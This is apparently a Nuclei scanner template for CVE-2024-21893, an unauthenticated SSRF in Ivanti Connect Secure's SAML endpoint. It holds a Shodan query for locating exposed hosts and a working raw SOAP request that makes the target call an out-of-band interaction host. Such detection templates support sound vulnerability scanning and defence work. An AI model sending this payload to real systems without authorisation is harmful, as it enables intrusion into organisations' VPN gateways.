2024-02-03 08:20:02 +00:00
id: CVE-2024-21893
info:
  name: Ivanti SAML - Server Side Request Forgery (SSRF)
  author: DhiyaneshDk
  severity: high
  description: |
    A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
  reference:
    - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
    - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
    - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
    - https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-21893
    cwe-id: CWE-918
    epss-score: 0.96139
    epss-percentile: 0.99473
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2024,kev,ssrf,ivanti
http:
  - raw:
      - |
        POST /dana-ws/saml20.ws HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a0046304402200a0547b87f667aa36af039f186372735c368c54758d1da68f5b0fd18312a8c0402201944364cc59a7b39458b86b84369d97aa826d793c83d4c42fed8f694a87920be:922c64590222798bb761d5b6d8e72950